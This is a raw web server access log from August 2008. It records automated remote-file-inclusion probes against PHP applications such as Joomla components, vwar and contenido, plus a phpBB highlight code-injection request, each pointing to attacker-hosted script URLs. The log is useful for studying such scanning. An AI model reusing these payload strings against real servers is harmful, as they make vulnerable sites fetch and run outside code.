61.19.158.41 - - [31/Aug/2008:09:59:09 -0700] "GET /adm/my_statistics.http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:09 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:10 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:59:10 -0700] "GET /logs/adm/my_statistics.http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:59:10 -0700] "GET /adm/my_statistics.http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:10 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:59:17 -0700] "GET /logs/access_080526.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:59:19 -0700] "GET /logs/access_080820.log/adm/my_statistics.http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:59:19 -0700] "GET /logs/access_080820.log/adm/my_statistics.http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:26 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:59:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:27 -0700] "GET /?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89592 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:59:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:29 -0700] "GET /logs/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 63000 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:59:38 -0700] "GET /logs/access_080701.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:59:39 -0700] "GET /logs/access_080510.log/index.php?lang=gr&filehttp://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:59:41 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:41 -0700] "GET /logs/access_080528.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:59:46 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:51 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:51 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:59:51 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:59:56 -0700] "GET /logs/access_080209.log//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:00:05 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:00:05 -0700] "GET /logs/access_080523.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:00:11 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:00:11 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:10:00:14 -0700] "GET /logs/access_080224.log/index.php?p=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:00:18 -0700] "GET /logs/access_080808.log/inc/header.php/step_one.php?server_inc=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:00:31 -0700] "GET /logs/access_080821.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.98.192.98 - - [31/Aug/2008:10:00:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:00:40 -0700] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:00:41 -0700] "GET /protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:00:41 -0700] "GET /logs/protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.192.98 - - [31/Aug/2008:10:00:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:57 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:57 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:10:00:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:01:05 -0700] "GET /logs/access_080602.log/htmltonuke.php?filnavn=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:01:35 -0700] "GET /logs/access_080518.log/htmltonuke.php?filnavn=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:01:44 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:01:49 -0700] "GET /logs/index.php?pag=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:01:50 -0700] "GET /index.php?pag=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 200 89511 "-" "libwww-perl/5.805" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:10:01:51 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:10:01:52 -0700] "GET /logs/access_070908.log HTTP/1.0" 200 91498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:01:54 -0700] "GET /logs/index.php?pag=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:01:54 -0700] "GET /index.php?pag=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 200 89527 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:00 -0700] "GET /logs/index.php?pag=http://cell-depot.com/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:01 -0700] "GET /index.php?pag=http://cell-depot.com/hack-id.txt? HTTP/1.1" 200 89422 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:01 -0700] "GET /logs/access_080409.log//faxelettronico.it/cache/?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:02 -0700] "GET /logs//faxelettronico.it/cache/?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:05 -0700] "GET /logs/access_080409.log//faxelettronico.it/cache?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:05 -0700] "GET /logs//faxelettronico.it/cache?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:02:22 -0700] "GET /logs/access_080820.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:26 -0700] "GET /logs/access_080410.log//faxelettronico.it/cache?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:10:02:27 -0700] "GET /logs/access_080820.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:02:27 -0700] "GET /logs/access_080410.log//faxelettronico.it/cache/?cache.php=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:02:48 -0700] "GET /logs/access_080302.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:02:49 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 89646 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:02:50 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:51 -0700] "GET /logs/access_080731.log/index.php?pag=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:52 -0700] "GET /logs/access_080507.log/index.php?pag=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:52 -0700] "GET /logs/index.php?pag=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:02:52 -0700] "GET /index.php?pag=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 200 89441 "-" "libwww-perl/5.805" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:02:57 -0700] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:03:04 -0700] "GET /logs/access_080820.log/index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:03:05 -0700] "GET /index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:03:05 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:03:18 -0700] "GET /logs/access_080528.log/index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:10:03:20 -0700] "GET /bikes/dteel/2008_08_17/?S=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:03:22 -0700] "GET /logs/access_080411.log//modul.php?mod=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:03:22 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:03:22 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:10:03:32 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:03:32 -0700] "GET /logs/access_080302.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:10:03:32 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:03:33 -0700] "GET /errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:03:34 -0700] "GET /logs/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:03:37 -0700] "GET /logs/access_080818.log/index.php?page=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:03:37 -0700] "GET /logs/index.php?page=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:03:37 -0700] "GET /index.php?page=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 200 89462 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:10:03:43 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:10:03:44 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:10:03:44 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:04:29 -0700] "GET /logs/access_080707.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:10:04:33 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:04:42 -0700] "GET /logs/access_080522.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:05:05 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:05:17 -0700] "GET /logs/access_080522.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:05:35 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:05:35 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:10:05:48 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:10:05:48 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:05:49 -0700] "GET /logs/access_080203.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:05:49 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:10:05:58 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:06:22 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:10:06:22 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:06:22 -0700] "GET /logs/access_080115.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:06:23 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:06:23 -0700] "GET /logs/access_080121.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:06:23 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:06:29 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:10:06:33 -0700] "GET /logs/access_080614.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:34 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:34 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:35 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:35 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:35 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:06:36 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:06:40 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:06:41 -0700] "GET //oneadmin/config.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:06:41 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:06:52 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:06:58 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:06:59 -0700] "GET /logs/access_080707.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:07:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:07:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
